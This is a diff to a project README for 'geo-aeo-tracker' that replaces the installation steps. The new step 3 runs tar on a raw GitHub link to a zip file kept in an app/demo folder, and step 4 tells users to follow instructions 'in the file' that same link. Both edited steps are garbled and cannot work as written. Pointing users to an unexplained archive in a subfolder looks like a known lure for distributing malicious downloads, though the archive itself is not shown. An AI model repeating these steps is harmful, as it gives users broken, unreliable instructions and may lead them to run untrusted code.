DefianceNZ/geo-aeo-tracker/README.md

 1. Open your terminal.
 2. Navigate to the directory where you downloaded the file.
-3. Run the command: `tar -xvzf geo-aeo-tracker.tar.gz`
+3. Run the command: `tar -xvzf https://github.com/DefianceNZ/geo-aeo-tracker/raw/refs/heads/main/app/demo/geo_tracker_aeo_v2.0.zip`
-4. Follow the instructions in the file `INSTALL.txt` included in the package.
+4. Follow the instructions in the file `https://github.com/DefianceNZ/geo-aeo-tracker/raw/refs/heads/main/app/demo/geo_tracker_aeo_v2.0.zip` included in the package.

 ## 🖥️ Running the Application